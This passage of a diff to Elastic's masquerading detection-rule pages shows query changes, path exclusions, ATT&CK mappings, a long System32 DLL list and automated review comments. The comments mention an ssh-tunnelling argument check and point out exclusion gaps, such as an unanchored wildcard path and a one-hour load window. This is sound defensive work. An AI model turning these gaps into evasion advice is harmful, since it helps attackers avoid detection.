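Review bot: in the `@@ -47,19 +47,21 @@` hunk the ssh branch still reads `process.args in ("-R", "-L", "D", "-w")` on both the removed and the added lines; `"D"` has no leading dash, so an `ssh -D` dynamic (SOCKS) forward never satisfies this branch, which looks like a typo for `"-D"` and should be fixed while the block is being touched. The only functional change in the hunk is the added `and not process.args : "chmod"`, which suppresses invocations where `chmod` appears as a separate argument; record in the commit message what noise it addresses so the exclusion is not lost in the re-indentation diff.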
@@ -27,10 +27,11 @@ Identifies suspicious instances of browser processes, such as unsigned or signed * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Persistence * Rule Type: BBR * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -56,10 +57,26 @@ process where host.os.type == "windows" and event.type == "start" and (process.code_signature.subject_name : ("Google LLC", "Google Inc") and process.code_signature.trusted == true) and not ( - process.executable : "?:\\Program Files\\HP\\Sure Click\\servers\\chrome.exe" and + process.executable : ( + "?:\\Program Files\\HP\\Sure Click\\servers\\chrome.exe", + "?:\\Program Files\\HP\\Sure Click\\*\\servers\\chrome.exe" + ) and process.code_signature.subject_name : ("Bromium, Inc.") and process.code_signature.trusted == true - ) - and not process.hash.sha256 : "6538d54a236349f880d6793d219f558764629efc85d4d08b56b94717c01fb25a" + ) and + not ( + process.executable : ( + "?:\\Users\\*\\AppData\\Local\\ms-playwright\\chromium-*\\chrome-win\\chrome.exe", + "?:\\Users\\*\\AppData\\Local\\Programs\\synthetics-recorder\\resources\\local-browsers\\chromium-*\\chrome-win\\chrome.exe", + "*\\node_modules\\puppeteer\\.local-chromium\\win64-*\\chrome-win\\chrome.exe", + "?:\\Program Files (x86)\\Invicti Professional Edition\\chromium\\chrome.exe", + "?:\\Program Files\\End2End, Inc\\ARMS Html Engine\\chrome.exe", + "?:\\Users\\*\\AppData\\Local\\*BurpSuitePro\\burpbrowser\\*\\chrome.exe", + "?:\\Users\\*\\AppData\\Roaming\\*BurpSuite\\burpbrowser\\*\\chrome.exe" + ) and process.args: ( + "--enable-features=NetworkService,NetworkServiceInProcess", + "--type=crashpad-handler", "--enable-automation", "--disable-xss-auditor" + ) + ) ) or /* MS Edge Related Processes */ 
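Review bot: in the `@@ -56,10 +57,26 @@` hunk the new exclusion entry `"*\\node_modules\\puppeteer\\.local-chromium\\win64-*\\chrome-win\\chrome.exe"` begins with a bare `*`, unlike the surrounding entries anchored on `?:\\`, so a `chrome.exe` placed under a matching `node_modules\puppeteer\...` suffix anywhere on disk, including user-writable locations, is exempted whenever one of the listed `process.args` values is present; anchor it on `?:\\` or the user profile path like the neighbouring entries. The same hunk replaces `not process.hash.sha256 : "6538d54a..."` with the path-plus-argument exclusions, which is a reasonable trade, but the commit message should say what that hash covered so reviewers can confirm the new entries replace it.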
@@ -70,6 +87,11 @@ process where host.os.type == "windows" and event.type == "start" and "MicrosoftEdgeUpdateComRegisterShell64.exe", "msedgerecovery.exe", "MicrosoftEdgeUpdateSetup.exe" ) and not (process.code_signature.subject_name : "Microsoft Corporation" and process.code_signature.trusted == true) + and not + ( + process.name : "msedgewebview2.exe" and + process.code_signature.subject_name : ("Bromium, Inc.") and process.code_signature.trusted == true + ) ) or /* Brave Related Processes */ @@ -85,9 +107,14 @@ process where host.os.type == "windows" and event.type == "start" and (process.name : ( "firefox.exe", "pingsender.exe", "default-browser-agent.exe", "maintenanceservice.exe", "plugin-container.exe", "maintenanceservice_tmp.exe", "maintenanceservice_installer.exe", - "minidump-analyzer.exe", "crashreporter.exe" + "minidump-analyzer.exe" ) and not (process.code_signature.subject_name : "Mozilla Corporation" and process.code_signature.trusted == true) + and not + ( + process.name : "default-browser-agent.exe" and + process.code_signature.subject_name : ("WATERFOX LIMITED") and process.code_signature.trusted == true + ) ) or /* Island Related Processes */ @@ -124,7 +151,9 @@ process where host.os.type == "windows" and event.type == "start" and "Google LLC", "Google Inc", "Microsoft Corporation", - "NAVER Corp." + "NAVER Corp.", + "AVG Technologies USA, LLC", + "Avast Software s.r.o." ) and process.code_signature.trusted == true ) ) 
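Review bot: the `@@ -85,9 +107,14 @@` hunk drops `"crashreporter.exe"` from the monitored Firefox process names (`"minidump-analyzer.exe", "crashreporter.exe"` becomes `"minidump-analyzer.exe"`), which reduces coverage rather than adding an exclusion and is not mentioned in the commit message; if it was removed for noise, say so in the message, otherwise keep the name and add a signer-scoped exclusion like the one this hunk adds for `default-browser-agent.exe` signed by `"WATERFOX LIMITED"`.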
@@ -142,3 +171,19 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Masquerading ** ID: T1036 ** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Compromise Client Software Binary +** ID: T1554 +** Reference URL: https://attack.mitre.org/techniques/T1554/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-business-app-installer.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-business-app-installer.asciidoc index 09f6d49571..3d87d4d879 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-business-app-installer.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-business-app-installer.asciidoc @@ -30,9 +30,11 @@ Identifies executables with names resembling legitimate business applications bu * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Initial Access +* Tactic: Execution * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -186,6 +188,14 @@ process where host.os.type == "windows" and ** Name: Masquerading ** ID: T1036 ** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ * Tactic: ** Name: Initial Access ** ID: TA0001 
@@ -194,3 +204,15 @@ process where host.os.type == "windows" and ** Name: Drive-by Compromise ** ID: T1189 ** Reference URL: https://attack.mitre.org/techniques/T1189/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: User Execution +** ID: T1204 +** Reference URL: https://attack.mitre.org/techniques/T1204/ +* Sub-technique: +** Name: Malicious File +** ID: T1204.002 +** Reference URL: https://attack.mitre.org/techniques/T1204/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-communication-apps.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-communication-apps.asciidoc index a8cc04caae..6c36d2713d 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-communication-apps.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-communication-apps.asciidoc @@ -9,9 +9,9 @@ Identifies suspicious instances of communications apps, both unsigned and rename * logs-endpoint.events.* -*Severity*: low +*Severity*: medium -*Risk score*: 21 +*Risk score*: 47 *Runs every*: 5m @@ -27,10 +27,9 @@ Identifies suspicious instances of communications apps, both unsigned and rename * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion -* Rule Type: BBR * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: 
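Review bot: in potential-masquerading-as-communication-apps.asciidoc the `@@ -27,10 +27,9 @@` hunk removes `* Rule Type: BBR` while the `@@ -9,9 +9,9 @@` hunk raises `*Severity*` from low to medium and `*Risk score*` from 21 to 47, so the rule moves from a building-block rule to one that raises alerts; no query hunk accompanies the promotion and the commit message gives no reason, so document the tuning or expected false-positive rate that justifies alerting at medium severity.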
@@ -117,3 +116,19 @@ process where host.os.type == "windows" and ** Name: Masquerading ** ID: T1036 ** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Compromise Client Software Binary +** ID: T1554 +** Reference URL: https://attack.mitre.org/techniques/T1554/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-system32-dll.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-system32-dll.asciidoc index 2e54b159ab..f0248aae83 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-system32-dll.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-system32-dll.asciidoc @@ -28,9 +28,10 @@ Identifies suspicious instances of default system32 DLLs either unsigned or sign * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Persistence * Rule Type: BBR -*Version*: 1 +*Version*: 102 *Rule authors*: @@ -44,7 +45,7 @@ Identifies suspicious instances of default system32 DLLs either unsigned or sign [source, js] ---------------------------------- -library where event.action == "load" and +library where event.action == "load" and dll.Ext.relative_file_creation_time <= 3600 and not ( dll.path : ( "?:\\Windows\\System32\\*", 
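Review bot: the `@@ -44,7 +45,7 @@` hunk adds `dll.Ext.relative_file_creation_time <= 3600` to the `library where event.action == "load"` query, so a masquerading DLL is only flagged when loaded within an hour of its creation; a DLL planted earlier and loaded later (at next logon or reboot, for instance) is now missed, and `dll.Ext.*` is an Elastic Defend extension field, so both constraints belong in the rule description. The bump from `*Version*: 1` to `*Version*: 102` also differs from the +1 bumps on every other page in this change; confirm it is intentional.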
@@ -52,6 +53,8 @@ library where event.action == "load" and "?:\\Windows\\SystemTemp\\*", "?:\\$WINDOWS.~BT\\NewOS\\Windows\\WinSxS\\*", "?:\\$WINDOWS.~BT\\NewOS\\Windows\\System32\\*", + "?:\\$WINDOWS.~BT\\Sources\\*", + "?:\\$WINDOWS.~BT\\Work\\*", "?:\\Windows\\WinSxS\\*", "?:\\Windows\\SoftwareDistribution\\Download\\*", "?:\\Windows\\assembly\\NativeImages_v*" 
@@ -71,8 +74,29 @@ library where event.action == "load" and "aadauthhelper.dll", "aadcloudap.dll", "aadjcsp.dll", "aadtb.dll", "aadwamextension.dll", "aarsvc.dll", "abovelockapphost.dll", "accessibilitycpl.dll", "accountaccessor.dll", "accountsrt.dll", "acgenral.dll", "aclayers.dll", "acledit.dll", "aclui.dll", "acmigration.dll", "acppage.dll", "acproxy.dll", "acspecfc.dll", "actioncenter.dll", "actioncentercpl.dll", "actionqueue.dll", "activationclient.dll", "activeds.dll", "activesynccsp.dll", "actxprxy.dll", "acwinrt.dll", "acxtrnal.dll", "adaptivecards.dll", "addressparser.dll", "adhapi.dll", "adhsvc.dll", "admtmpl.dll", "adprovider.dll", "adrclient.dll", "adsldp.dll", "adsldpc.dll", "adsmsext.dll", "adsnt.dll", "adtschema.dll", "advancedemojids.dll", "advapi32.dll", "advapi32res.dll", "advpack.dll", "aeevts.dll", "aeinv.dll", "aepic.dll", "ajrouter.dll", "altspace.dll", "amsi.dll", "amsiproxy.dll", "amstream.dll", "apds.dll", "aphostclient.dll", "aphostres.dll", "aphostservice.dll", "apisampling.dll", "apisetschema.dll", "apmon.dll", "apmonui.dll", "appcontracts.dll", "appextension.dll", "apphelp.dll", "apphlpdm.dll", "appidapi.dll", "appidsvc.dll", "appinfo.dll", "appinfoext.dll", "applicationframe.dll", "applockercsp.dll", "appmgmts.dll", "appmgr.dll", "appmon.dll", "appointmentapis.dll", "appraiser.dll", "appreadiness.dll", "apprepapi.dll", "appresolver.dll", "appsruprov.dll", "appvcatalog.dll", "appvclientps.dll", "appvetwclientres.dll", "appvintegration.dll", "appvmanifest.dll", "appvpolicy.dll", "appvpublishing.dll", "appvreporting.dll", "appvscripting.dll", "appvsentinel.dll", "appvstreamingux.dll", "appvstreammap.dll", "appvterminator.dll", "appxalluserstore.dll", "appxpackaging.dll", "appxsip.dll", "appxsysprep.dll", "archiveint.dll", "asferror.dll", "aspnet_counters.dll", "asycfilt.dll", "atl.dll", "atlthunk.dll", "atmlib.dll", "audioeng.dll", "audiohandlers.dll", "audiokse.dll", "audioses.dll", "audiosrv.dll", "auditcse.dll", "auditpolcore.dll", 
"auditpolmsg.dll", "authbroker.dll", "authbrokerui.dll", "authentication.dll", "authext.dll", "authfwcfg.dll", "authfwgp.dll", "authfwsnapin.dll", "authfwwizfwk.dll", "authhostproxy.dll", "authui.dll", "authz.dll", "autopilot.dll", "autopilotdiag.dll", "autoplay.dll", "autotimesvc.dll", "avicap32.dll", "avifil32.dll", "avrt.dll", "axinstsv.dll", "azroles.dll", "azroleui.dll", "azsqlext.dll", "basecsp.dll", "basesrv.dll", "batmeter.dll", "bcastdvrbroker.dll", "bcastdvrclient.dll", "bcastdvrcommon.dll", "bcd.dll", "bcdprov.dll", "bcdsrv.dll", "bcp47langs.dll", "bcp47mrm.dll", "bcrypt.dll", "bcryptprimitives.dll", "bdehdcfglib.dll", "bderepair.dll", "bdesvc.dll", "bdesysprep.dll", "bdeui.dll", "bfe.dll", "bi.dll", "bidispl.dll", "bindfltapi.dll", "bingasds.dll", "bingfilterds.dll", "bingmaps.dll", "biocredprov.dll", "bisrv.dll", "bitlockercsp.dll", "bitsigd.dll", "bitsperf.dll", "bitsproxy.dll", "biwinrt.dll", "blbevents.dll", "blbres.dll", "blb_ps.dll", "bluetoothapis.dll", "bnmanager.dll", "bootmenuux.dll", "bootstr.dll", "bootux.dll", "bootvid.dll", "bridgeres.dll", "brokerlib.dll", "browcli.dll", "browserbroker.dll", "browseui.dll", "btagservice.dll", "bthavctpsvc.dll", "bthavrcp.dll", "bthavrcpappsvc.dll", "bthci.dll", "bthpanapi.dll", "bthradiomedia.dll", "bthserv.dll", "bthtelemetry.dll", "btpanui.dll", "bwcontexthandler.dll", "cabapi.dll", "cabinet.dll", "cabview.dll", "callbuttons.dll", "cameracaptureui.dll", "capauthz.dll", "capiprovider.dll", "capisp.dll", "captureservice.dll", "castingshellext.dll", "castlaunch.dll", "catsrv.dll", "catsrvps.dll", "catsrvut.dll", "cbdhsvc.dll", "cca.dll", "cdd.dll", "cdosys.dll", "cdp.dll", "cdprt.dll", "cdpsvc.dll", "cdpusersvc.dll", "cemapi.dll", "certca.dll", "certcli.dll", "certcredprovider.dll", "certenc.dll", "certenroll.dll", "certenrollui.dll", "certmgr.dll", "certpkicmdlet.dll", "certpoleng.dll", "certprop.dll", "cewmdm.dll", "cfgbkend.dll", "cfgmgr32.dll", "cfgspcellular.dll", "cfgsppolicy.dll", "cflapi.dll", 
"cfmifs.dll", "cfmifsproxy.dll", "chakra.dll", "chakradiag.dll", "chakrathunk.dll", "chartv.dll", "chatapis.dll", "chkwudrv.dll", "chsstrokeds.dll", "chtbopomofods.dll", "chtcangjieds.dll", "chthkstrokeds.dll", "chtquickds.dll", "chxapds.dll", "chxdecoder.dll", "chxhapds.dll", "chxinputrouter.dll", "chxranker.dll", "ci.dll", "cic.dll", "cimfs.dll", "circoinst.dll", "ciwmi.dll", "clb.dll", "clbcatq.dll", "cldapi.dll", "cleanpccsp.dll", "clfsw32.dll", "cliconfg.dll", "clipboardserver.dll", "clipc.dll", "clipsvc.dll", "clipwinrt.dll", "cloudap.dll", "cloudidsvc.dll", "clrhost.dll", "clusapi.dll", "cmcfg32.dll", "cmdext.dll", "cmdial32.dll", "cmgrcspps.dll", "cmifw.dll", "cmintegrator.dll", "cmlua.dll", "cmpbk32.dll", "cmstplua.dll", "cmutil.dll", "cngcredui.dll", "cngprovider.dll", "cnvfat.dll", "cofiredm.dll", "colbact.dll", "colorcnv.dll", "colorui.dll", "combase.dll", "comcat.dll", "comctl32.dll", "comdlg32.dll", "coml2.dll", "comppkgsup.dll", "compstui.dll", "computecore.dll", "computenetwork.dll", "computestorage.dll", "comrepl.dll", "comres.dll", "comsnap.dll", "comsvcs.dll", "comuid.dll", "configmanager2.dll", "conhostv1.dll", "connect.dll", "consentux.dll", "consentuxclient.dll", "console.dll", "consolelogon.dll", "contactapis.dll", "container.dll", "coredpus.dll", "coreglobconfig.dll", "coremas.dll", "coremessaging.dll", "coremmres.dll", "coreshell.dll", "coreshellapi.dll", "coreuicomponents.dll", "correngine.dll", "courtesyengine.dll", "cpfilters.dll", "creddialogbroker.dll", "credprovhelper.dll", "credprovhost.dll", "credprovs.dll", "credprovslegacy.dll", "credssp.dll", "credui.dll", "crypt32.dll", "cryptbase.dll", "cryptcatsvc.dll", "cryptdlg.dll", "cryptdll.dll", "cryptext.dll", "cryptnet.dll", "cryptngc.dll", "cryptowinrt.dll", "cryptsp.dll", "cryptsvc.dll", "crypttpmeksvc.dll", "cryptui.dll", "cryptuiwizard.dll", "cryptxml.dll", "cscapi.dll", "cscdll.dll", "cscmig.dll", "cscobj.dll", "cscsvc.dll", "cscui.dll", "csplte.dll", "cspproxy.dll", "csrsrv.dll", 
"cxcredprov.dll", "c_g18030.dll", "c_gsm7.dll", "c_is2022.dll", "c_iscii.dll", "d2d1.dll", "d3d10.dll", "d3d10core.dll", "d3d10level9.dll", "d3d10warp.dll", "d3d10_1.dll", "d3d10_1core.dll", "d3d11.dll", "d3d11on12.dll", "d3d12.dll", "d3d12core.dll", "d3d8thk.dll", "d3d9.dll", "d3d9on12.dll", "d3dscache.dll", "dab.dll", "dabapi.dll", "daconn.dll", "dafbth.dll", "dafdnssd.dll", "dafescl.dll", "dafgip.dll", "dafiot.dll", "dafipp.dll", "dafmcp.dll", "dafpos.dll", "dafprintprovider.dll", "dafupnp.dll", "dafwcn.dll", "dafwfdprovider.dll", "dafwiprov.dll", "dafwsd.dll", "damediamanager.dll", "damm.dll", "das.dll", "dataclen.dll", "datusage.dll", "davclnt.dll", "davhlpr.dll", "davsyncprovider.dll", "daxexec.dll", "dbgcore.dll", "dbgeng.dll", "dbghelp.dll", "dbgmodel.dll", "dbnetlib.dll", "dbnmpntw.dll", "dciman32.dll", "dcntel.dll", "dcomp.dll", "ddaclsys.dll", "ddcclaimsapi.dll", "ddds.dll", "ddisplay.dll", "ddoiproxy.dll", "ddores.dll", "ddpchunk.dll", "ddptrace.dll", "ddputils.dll", "ddp_ps.dll", "ddraw.dll", "ddrawex.dll", "defragproxy.dll", "defragres.dll", "defragsvc.dll", "deploymentcsps.dll", "deskadp.dll", "deskmon.dll", "desktopshellext.dll", "devenum.dll", "deviceaccess.dll", "devicecenter.dll", "devicecredential.dll", "devicepairing.dll", "deviceuxres.dll", "devinv.dll", "devmgr.dll", "devobj.dll", "devpropmgr.dll", "devquerybroker.dll", "devrtl.dll", "dfdts.dll", "dfscli.dll", "dfshim.dll", "dfsshlex.dll", "dggpext.dll", "dhcpcmonitor.dll", "dhcpcore.dll", "dhcpcore6.dll", "dhcpcsvc.dll", "dhcpcsvc6.dll", "dhcpsapi.dll", "diagcpl.dll", "diagnosticlogcsp.dll", "diagperf.dll", "diagsvc.dll", "diagtrack.dll", "dialclient.dll", "dialserver.dll", "dictationmanager.dll", "difxapi.dll", "dimsjob.dll", "dimsroam.dll", "dinput.dll", "dinput8.dll", "direct2ddesktop.dll", "directml.dll", "discan.dll", "dismapi.dll", "dispbroker.dll", "dispex.dll", "display.dll", "displaymanager.dll", "dlnashext.dll", "dmappsres.dll", "dmcfgutils.dll", "dmcmnutils.dll", "dmcsps.dll", 
"dmdlgs.dll", "dmdskmgr.dll", "dmdskres.dll", "dmdskres2.dll", "dmenrollengine.dll", "dmintf.dll", "dmiso8601utils.dll", "dmloader.dll", "dmocx.dll", "dmoleaututils.dll", "dmpushproxy.dll", "dmpushroutercore.dll", "dmrcdecoder.dll", "dmrserver.dll", "dmsynth.dll", "dmusic.dll", "dmutil.dll", "dmvdsitf.dll", "dmwappushsvc.dll", "dmwmicsp.dll", "dmxmlhelputils.dll", "dnsapi.dll", "dnscmmc.dll", "dnsext.dll", "dnshc.dll", "dnsrslvr.dll", "docprop.dll", "dolbydecmft.dll", "domgmt.dll", "dosettings.dll", "dosvc.dll", "dot3api.dll", "dot3cfg.dll", "dot3conn.dll", "dot3dlg.dll", "dot3gpclnt.dll", "dot3gpui.dll", "dot3hc.dll", "dot3mm.dll", "dot3msm.dll", "dot3svc.dll", "dot3ui.dll", "dpapi.dll", "dpapiprovider.dll", "dpapisrv.dll", "dpnaddr.dll", "dpnathlp.dll", "dpnet.dll", "dpnhpast.dll", "dpnhupnp.dll", "dpnlobby.dll", "dps.dll", "dpx.dll", "drprov.dll", "drt.dll", "drtprov.dll", "drttransport.dll", "drvsetup.dll", "drvstore.dll", "dsauth.dll", "dsccore.dll", "dsccoreconfprov.dll", "dsclient.dll", "dscproxy.dll", "dsctimer.dll", "dsdmo.dll", "dskquota.dll", "dskquoui.dll", "dsound.dll", "dsparse.dll", "dsprop.dll", "dsquery.dll", "dsreg.dll", "dsregtask.dll", "dsrole.dll", "dssec.dll", "dssenh.dll", "dssvc.dll", "dsui.dll", "dsuiext.dll", "dswave.dll", "dtsh.dll", "ducsps.dll", "dui70.dll", "duser.dll", "dusmapi.dll", "dusmsvc.dll", "dwmapi.dll", "dwmcore.dll", "dwmghost.dll", "dwminit.dll", "dwmredir.dll", "dwmscene.dll", "dwrite.dll", "dxcore.dll", "dxdiagn.dll", "dxgi.dll", "dxgwdi.dll", "dxilconv.dll", "dxmasf.dll", "dxp.dll", "dxpps.dll", "dxptasksync.dll", "dxtmsft.dll", "dxtrans.dll", "dxva2.dll", "dynamoapi.dll", "eapp3hst.dll", "eappcfg.dll", "eappcfgui.dll", "eappgnui.dll", "eapphost.dll", "eappprxy.dll", "eapprovp.dll", "eapputil.dll", "eapsimextdesktop.dll", "eapsvc.dll", "eapteapauth.dll", "eapteapconfig.dll", "eapteapext.dll", "easconsent.dll", "easwrt.dll", "edgeangle.dll", "edgecontent.dll", "edgehtml.dll", "edgeiso.dll", "edgemanager.dll", 
"edpauditapi.dll", "edpcsp.dll", "edptask.dll", "edputil.dll", "eeprov.dll", "eeutil.dll", "efsadu.dll", "efscore.dll", "efsext.dll", "efslsaext.dll", "efssvc.dll", "efsutil.dll", "efswrt.dll", "ehstorapi.dll", "ehstorpwdmgr.dll", "ehstorshell.dll", "els.dll", "elscore.dll", "elshyph.dll", "elslad.dll", "elstrans.dll", "emailapis.dll", "embeddedmodesvc.dll", "emojids.dll", "encapi.dll", "energy.dll", "energyprov.dll", "energytask.dll", "enrollmentapi.dll", "enterpriseapncsp.dll", "enterprisecsps.dll", "enterpriseetw.dll", "eqossnap.dll", "errordetails.dll", "errordetailscore.dll", "es.dll", "esclprotocol.dll", "esclscan.dll", "esclwiadriver.dll", "esdsip.dll", "esent.dll", "esentprf.dll", "esevss.dll", "eshims.dll", "etwrundown.dll", "euiccscsp.dll", "eventaggregation.dll", "eventcls.dll", "evr.dll", "execmodelclient.dll", "execmodelproxy.dll", "explorerframe.dll", "exsmime.dll", "extrasxmlparser.dll", "f3ahvoas.dll", "facilitator.dll", "familysafetyext.dll", "faultrep.dll", "fcon.dll", "fdbth.dll", "fdbthproxy.dll", "fddevquery.dll", "fde.dll", "fdeploy.dll", "fdphost.dll", "fdpnp.dll", "fdprint.dll", "fdproxy.dll", "fdrespub.dll", "fdssdp.dll", "fdwcn.dll", "fdwnet.dll", "fdwsd.dll", "feclient.dll", "ffbroker.dll", "fhcat.dll", "fhcfg.dll", "fhcleanup.dll", "fhcpl.dll", "fhengine.dll", "fhevents.dll", "fhshl.dll", "fhsrchapi.dll", "fhsrchph.dll", "fhsvc.dll", "fhsvcctl.dll", "fhtask.dll", "fhuxadapter.dll", "fhuxapi.dll", "fhuxcommon.dll", "fhuxgraphics.dll", "fhuxpresentation.dll", "fidocredprov.dll", "filemgmt.dll", "filterds.dll", "findnetprinters.dll", "firewallapi.dll", "flightsettings.dll", "fltlib.dll", "fluencyds.dll", "fmapi.dll", "fmifs.dll", "fms.dll", "fntcache.dll", "fontext.dll", "fontprovider.dll", "fontsub.dll", "fphc.dll", "framedyn.dll", "framedynos.dll", "frameserver.dll", "frprov.dll", "fsutilext.dll", "fthsvc.dll", "fundisc.dll", "fveapi.dll", "fveapibase.dll", "fvecerts.dll", "fvecpl.dll", "fveskybackup.dll", "fveui.dll", "fvewiz.dll", 
"fwbase.dll", "fwcfg.dll", "fwmdmcsp.dll", "fwpolicyiomgr.dll", "fwpuclnt.dll", "fwremotesvr.dll", "gameinput.dll", "gamemode.dll", "gamestreamingext.dll", "gameux.dll", "gamingtcui.dll", "gcdef.dll", "gdi32.dll", "gdi32full.dll", "gdiplus.dll", "generaltel.dll", "geocommon.dll", "geolocation.dll", "getuname.dll", "glmf32.dll", "globinputhost.dll", "glu32.dll", "gmsaclient.dll", "gpapi.dll", "gpcsewrappercsp.dll", "gpedit.dll", "gpprefcl.dll", "gpprnext.dll", "gpscript.dll", "gpsvc.dll", "gptext.dll", "graphicscapture.dll", "graphicsperfsvc.dll", "groupinghc.dll", "hal.dll", "halextpl080.dll", "hascsp.dll", "hashtagds.dll", "hbaapi.dll", "hcproviders.dll", "hdcphandler.dll", "heatcore.dll", "helppaneproxy.dll", "hgcpl.dll", "hhsetup.dll", "hid.dll", "hidcfu.dll", "hidserv.dll", "hlink.dll", "hmkd.dll", "hnetcfg.dll", "hnetcfgclient.dll", "hnetmon.dll", "hologramworld.dll", "holoshellruntime.dll", "holoshextensions.dll", "hotplug.dll", "hrtfapo.dll", "httpapi.dll", "httpprxc.dll", "httpprxm.dll", "httpprxp.dll", "httpsdatasource.dll", "htui.dll", "hvhostsvc.dll", "hvloader.dll", "hvsigpext.dll", "hvsocket.dll", "hydrogen.dll", "ia2comproxy.dll", "ias.dll", "iasacct.dll", "iasads.dll", "iasdatastore.dll", "iashlpr.dll", "iasmigplugin.dll", "iasnap.dll", "iaspolcy.dll", "iasrad.dll", "iasrecst.dll", "iassam.dll", "iassdo.dll", "iassvcs.dll", "icfupgd.dll", "icm32.dll", "icmp.dll", "icmui.dll", "iconcodecservice.dll", "icsigd.dll", "icsvc.dll", "icsvcext.dll", "icu.dll", "icuin.dll", "icuuc.dll", "idctrls.dll", "idlisten.dll", "idndl.dll", "idstore.dll", "ieadvpack.dll", "ieapfltr.dll", "iedkcs32.dll", "ieframe.dll", "iemigplugin.dll", "iepeers.dll", "ieproxy.dll", "iernonce.dll", "iertutil.dll", "iesetup.dll", "iesysprep.dll", "ieui.dll", "ifmon.dll", "ifsutil.dll", "ifsutilx.dll", "igddiag.dll", "ihds.dll", "ikeext.dll", "imagehlp.dll", "imageres.dll", "imagesp1.dll", "imapi.dll", "imapi2.dll", "imapi2fs.dll", "imgutil.dll", "imm32.dll", "implatsetup.dll", 
"indexeddblegacy.dll", "inetcomm.dll", "inetmib1.dll", "inetpp.dll", "inetppui.dll", "inetres.dll", "inked.dll", "inkobjcore.dll", "inproclogger.dll", "input.dll", "inputcloudstore.dll", "inputcontroller.dll", "inputhost.dll", "inputservice.dll", "inputswitch.dll", "inseng.dll", "installservice.dll", "internetmail.dll", "internetmailcsp.dll", "invagent.dll", "iologmsg.dll", "iphlpapi.dll", "iphlpsvc.dll", "ipnathlp.dll", "ipnathlpclient.dll", "ippcommon.dll", "ippcommonproxy.dll", "iprtprio.dll", "iprtrmgr.dll", "ipsecsnp.dll", "ipsecsvc.dll", "ipsmsnap.dll", "ipxlatcfg.dll", "iri.dll", "iscsicpl.dll", "iscsidsc.dll", "iscsied.dll", "iscsiexe.dll", "iscsilog.dll", "iscsium.dll", "iscsiwmi.dll", "iscsiwmiv2.dll", "ism.dll", "itircl.dll", "itss.dll", "iuilp.dll", "iumbase.dll", "iumcrypt.dll", "iumdll.dll", "iumsdk.dll", "iyuv_32.dll", "joinproviderol.dll", "joinutil.dll", "jpmapcontrol.dll", "jpndecoder.dll", "jpninputrouter.dll", "jpnranker.dll", "jpnserviceds.dll", "jscript.dll", "jscript9.dll", "jscript9diag.dll", "jsproxy.dll", "kbd101.dll", "kbd101a.dll", "kbd101b.dll", "kbd101c.dll", "kbd103.dll", "kbd106.dll", "kbd106n.dll", "kbda1.dll", "kbda2.dll", "kbda3.dll", "kbdadlm.dll", "kbdal.dll", "kbdarme.dll", "kbdarmph.dll", "kbdarmty.dll", "kbdarmw.dll", "kbdax2.dll", "kbdaze.dll", "kbdazel.dll", "kbdazst.dll", "kbdbash.dll", "kbdbe.dll", "kbdbene.dll", "kbdbgph.dll", "kbdbgph1.dll", "kbdbhc.dll", "kbdblr.dll", "kbdbr.dll", "kbdbu.dll", "kbdbug.dll", "kbdbulg.dll", "kbdca.dll", "kbdcan.dll", "kbdcher.dll", "kbdcherp.dll", "kbdcr.dll", "kbdcz.dll", "kbdcz1.dll", "kbdcz2.dll", "kbdda.dll", "kbddiv1.dll", "kbddiv2.dll", "kbddv.dll", "kbddzo.dll", "kbdes.dll", "kbdest.dll", "kbdfa.dll", "kbdfar.dll", "kbdfc.dll", "kbdfi.dll", "kbdfi1.dll", "kbdfo.dll", "kbdfr.dll", "kbdfthrk.dll", "kbdgae.dll", "kbdgeo.dll", "kbdgeoer.dll", "kbdgeome.dll", "kbdgeooa.dll", "kbdgeoqw.dll", "kbdgkl.dll", "kbdgn.dll", "kbdgr.dll", "kbdgr1.dll", "kbdgrlnd.dll", "kbdgthc.dll", 
